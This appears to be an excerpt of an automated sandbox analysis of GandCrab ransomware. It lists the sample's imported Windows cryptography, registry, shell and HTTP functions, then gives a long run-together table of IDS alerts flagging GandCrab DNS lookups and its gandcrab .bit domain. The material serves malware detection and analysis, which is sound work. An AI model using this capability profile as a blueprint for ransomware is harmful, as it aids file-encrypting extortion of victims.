                                    USER32.dllwsprintfW, TranslateMessage, RegisterClassExW, LoadIconW, SetWindowLongW, EndPaint, BeginPaint, LoadCursorW, GetMessageW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, GetForegroundWindow, DestroyWindow
                                    GDI32.dllTextOutW
                                    ADVAPI32.dllCryptExportKey, AllocateAndInitializeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, FreeSid
                                    SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteExW, ShellExecuteW
                                    CRYPT32.dllCryptStringToBinaryA, CryptBinaryToStringA
                                    WININET.dllInternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
                                    PSAPI.DLLEnumDeviceDrivers, GetDeviceDriverBaseNameW
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    192.168.2.38.8.8.855642532829498 09/01/22-00:01:41.321667UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15564253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860090532829500 09/01/22-00:02:16.489371UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36009053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.862436532026737 09/01/22-00:02:57.542714UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6243653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855955532829500 09/01/22-00:03:25.632008UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35595553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853431532829498 09/01/22-00:02:18.409896UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15343153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865513532829500 09/01/22-00:02:19.430995UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36551353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864276532829498 09/01/22-00:03:00.100399UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16427653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851891532026737 09/01/22-00:03:31.975246UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5189153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859765532026737 09/01/22-00:03:34.032990UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5976553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853309532829500 09/01/22-00:01:54.918396UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35330953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854155532829498 09/01/22-00:02:39.711366UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15415553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849169532829500 09/01/22-00:02:32.443414UDP2829500ETPRO TROJAN GandCrab DNS Lookup 34916953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864378532829500 09/01/22-00:03:19.972139UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36437853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857391532829500 09/01/22-00:02:53.276938UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35739153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851597532026737 09/01/22-00:03:26.976848UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5159753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853271532829498 09/01/22-00:02:55.260307UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15327153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853471532829500 09/01/22-00:02:00.665796UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35347153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865323532026737 09/01/22-00:01:43.859132UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6532353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860647532829498 09/01/22-00:03:25.300157UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16064753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850230532026737 09/01/22-00:02:54.735839UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5023053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850624532026737 09/01/22-00:03:18.677171UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5062453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853468532829500 09/01/22-00:02:00.604247UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35346853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858122532829498 09/01/22-00:02:27.905128UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15812253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854436532829498 09/01/22-00:03:36.045306UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15443653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.862426532026737 09/01/22-00:03:13.145963UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6242653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.856046532829500 09/01/22-00:01:38.500367UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35604653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859378532829500 09/01/22-00:02:48.340518UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35937853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858305532026737 09/01/22-00:02:34.497221UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5830553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861418532829498 09/01/22-00:02:02.984507UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16141853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850095532026737 09/01/22-00:03:38.741458UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5009553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852114532026737 09/01/22-00:03:20.324395UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5211453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865466532829500 09/01/22-00:03:37.373699UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36546653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853042532026737 09/01/22-00:03:06.339869UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5304253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849877532829500 09/01/22-00:02:36.035379UDP2829500ETPRO TROJAN GandCrab DNS Lookup 34987753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864971532829500 09/01/22-00:03:05.617213UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36497153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861186532829498 09/01/22-00:02:52.648140UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16118653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859829532829500 09/01/22-00:02:55.953112UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35982953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849204532026737 09/01/22-00:02:46.678054UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)4920453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861364532829498 09/01/22-00:03:28.558638UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16136453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857829532829500 09/01/22-00:03:23.021549UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35782953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850788532026737 09/01/22-00:02:43.387386UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5078853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851996532026737 09/01/22-00:02:26.312895UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5199653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857706532829500 09/01/22-00:01:42.686131UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35770653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859436532026737 09/01/22-00:01:57.638087UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5943653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859822532026737 09/01/22-00:02:19.952319UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5982253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860587532026737 09/01/22-00:01:27.550732UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6058753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852957532829500 09/01/22-00:01:25.328522UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35295753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858914532829500 09/01/22-00:03:18.020601UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35891453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853850532026737 09/01/22-00:01:50.247028UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5385053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.856619532026737 09/01/22-00:02:49.126045UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5661953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852112532026737 09/01/22-00:03:20.284135UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5211253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865198532829500 09/01/22-00:02:04.768621UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36519853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853848532829498 09/01/22-00:01:59.462827UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15384853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851893532026737 09/01/22-00:03:32.036713UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5189353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854433532829498 09/01/22-00:03:35.979601UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15443353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853310532829500 09/01/22-00:01:54.940366UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35331053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859438532026737 09/01/22-00:01:57.681285UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5943853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861421532829498 09/01/22-00:02:03.043258UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16142153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852458532026737 09/01/22-00:03:02.844406UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5245853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855652532829498 09/01/22-00:03:19.259211UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15565253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861130532829498 09/01/22-00:03:15.942186UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16113053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860421532829498 09/01/22-00:03:32.382333UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16042153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864973532829500 09/01/22-00:03:05.661525UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36497353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863567532026737 09/01/22-00:02:17.089606UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6356753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865463532829500 09/01/22-00:03:37.309587UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36546353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865389532026737 09/01/22-00:02:38.719558UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6538953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853040532026737 09/01/22-00:03:06.300781UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5304053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857827532829500 09/01/22-00:03:22.978908UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35782753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853039532026737 09/01/22-00:03:06.280270UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5303953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859585532026737 09/01/22-00:02:11.746820UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5958553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857708532829500 09/01/22-00:01:42.729663UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35770853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851142532829498 09/01/22-00:01:24.090037UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15114253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853433532829498 09/01/22-00:02:18.458138UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15343353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860093532829500 09/01/22-00:02:16.558554UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36009353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849206532026737 09/01/22-00:02:46.717208UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)4920653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851143532829498 09/01/22-00:01:24.124615UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15114353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854158532829498 09/01/22-00:02:39.772185UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15415853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859376532829500 09/01/22-00:02:48.263272UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35937653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864825532829500 09/01/22-00:02:24.749273UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36482553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864273532829498 09/01/22-00:03:00.036817UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16427353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851894532026737 09/01/22-00:03:32.055555UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5189453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854434532829498 09/01/22-00:03:36.001169UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15443453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859768532026737 09/01/22-00:03:34.095324UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5976853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853054532829498 09/01/22-00:02:15.078816UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15305453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863448532829498 09/01/22-00:02:35.455212UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16344853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865111532829500 09/01/22-00:01:46.954181UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36511153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853627532026737 09/01/22-00:02:01.832804UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5362753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865200532829500 09/01/22-00:02:04.820486UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36520053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855461532829498 09/01/22-00:03:07.325312UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15546153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865390532026737 09/01/22-00:02:38.738598UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6539053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865516532829500 09/01/22-00:02:19.492210UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36551653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855654532829498 09/01/22-00:03:19.297074UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15565453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854288532829500 09/01/22-00:03:33.756470UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35428853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865515532829500 09/01/22-00:02:19.472414UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36551553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859767532026737 09/01/22-00:03:34.075907UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5976753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860649532829498 09/01/22-00:03:25.341169UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16064953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853628532026737 09/01/22-00:02:01.851234UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5362853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864970532829500 09/01/22-00:02:44.867082UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36497053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.862434532026737 09/01/22-00:02:57.492445UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6243453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859583532026737 09/01/22-00:02:11.706174UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5958353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850232532026737 09/01/22-00:02:54.777871UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5023253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852959532829500 09/01/22-00:01:25.367458UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35295953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850787532026737 09/01/22-00:02:43.367194UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5078753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858123532829498 09/01/22-00:02:27.969558UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15812353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860423532829498 09/01/22-00:03:32.424188UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16042353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865201532829500 09/01/22-00:02:04.842170UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36520153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854157532829498 09/01/22-00:02:39.751533UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15415753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865112532829500 09/01/22-00:01:46.974641UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36511253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859830532829500 09/01/22-00:02:55.974495UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35983053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855460532829498 09/01/22-00:03:07.301197UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15546053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853307532829500 09/01/22-00:01:54.875889UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35330753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851595532026737 09/01/22-00:03:26.929732UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5159553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.856044532829500 09/01/22-00:01:38.460693UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35604453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857828532829500 09/01/22-00:03:23.000023UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35782853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864606532829500 09/01/22-00:02:41.903320UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36460653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853273532829498 09/01/22-00:02:55.304130UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15327353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.856047532829500 09/01/22-00:01:38.529181UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35604753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850626532026737 09/01/22-00:03:18.717464UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5062653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863691532829498 09/01/22-00:03:21.687512UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16369153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859825532026737 09/01/22-00:02:20.014612UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5982553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855954532829500 09/01/22-00:03:25.612012UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35595453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.862428532026737 09/01/22-00:03:13.188986UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6242853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861419532829498 09/01/22-00:02:03.004767UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16141953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860474532829498 09/01/22-00:02:47.119975UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16047453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864274532829498 09/01/22-00:03:00.057400UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16427453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853853532026737 09/01/22-00:01:50.543832UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5385353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855248532829498 09/01/22-00:03:03.486266UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15524853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853432532829498 09/01/22-00:02:18.428585UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15343253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853849532829498 09/01/22-00:01:59.483040UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15384953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859586532026737 09/01/22-00:02:11.767488UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5958653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860477532829498 09/01/22-00:02:47.180255UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16047753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852743532026737 09/01/22-00:03:23.998658UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5274353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849170532829500 09/01/22-00:02:32.467435UDP2829500ETPRO TROJAN GandCrab DNS Lookup 34917053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865325532026737 09/01/22-00:01:43.903174UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6532553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857575532829498 09/01/22-00:01:53.271847UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15757553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849879532829500 09/01/22-00:02:36.072251UDP2829500ETPRO TROJAN GandCrab DNS Lookup 34987953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859640532026737 09/01/22-00:01:39.971866UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5964053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865109532829500 09/01/22-00:01:46.914019UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36510953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863450532829498 09/01/22-00:02:35.496675UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16345053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860646532829498 09/01/22-00:03:25.281760UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16064653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854285532829500 09/01/22-00:03:33.695070UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35428553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858915532829500 09/01/22-00:03:18.040653UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35891553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864974532829500 09/01/22-00:03:05.683602UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36497453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858482532829500 09/01/22-00:03:29.362481UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35848253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864125532829498 09/01/22-00:02:44.347197UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16412553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859437532026737 09/01/22-00:01:57.658266UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5943753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857137532829498 09/01/22-00:01:34.192981UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15713753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860819532829500 09/01/22-00:03:08.807703UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36081953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864598532829498 09/01/22-00:02:22.069673UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16459853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865388532026737 09/01/22-00:02:38.683294UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6538853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852460532026737 09/01/22-00:03:02.922606UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5246053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861361532829498 09/01/22-00:03:28.363595UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16136153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865464532829500 09/01/22-00:03:37.331573UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36546453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863566532026737 09/01/22-00:02:17.069143UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6356653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849203532026737 09/01/22-00:02:46.656883UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)4920353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864972532829500 09/01/22-00:03:05.639386UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36497253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853051532829498 09/01/22-00:02:15.015452UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15305153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851995532026737 09/01/22-00:02:26.294405UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5199553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851107532829500 09/01/22-00:03:01.623107UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35110753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864969532829500 09/01/22-00:02:44.846895UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36496953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852113532026737 09/01/22-00:03:20.304409UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5211353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858121532829498 09/01/22-00:02:27.883460UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15812153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857707532829500 09/01/22-00:01:42.707644UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35770753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861420532829498 09/01/22-00:02:03.023139UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16142053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860772532829498 09/01/22-00:01:45.515640UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16077253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859379532829500 09/01/22-00:02:48.360270UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35937953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860420532829498 09/01/22-00:03:32.361100UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16042053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858306532026737 09/01/22-00:02:34.518930UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5830653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857136532829498 09/01/22-00:01:34.170593UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15713653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863692532829498 09/01/22-00:03:21.709351UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16369253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851110532829500 09/01/22-00:03:01.687030UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35111053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855651532829498 09/01/22-00:03:19.239137UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15565153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861187532829498 09/01/22-00:02:52.669551UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16118753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850789532026737 09/01/22-00:02:43.405655UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5078953192.168.2.38.8.8.8
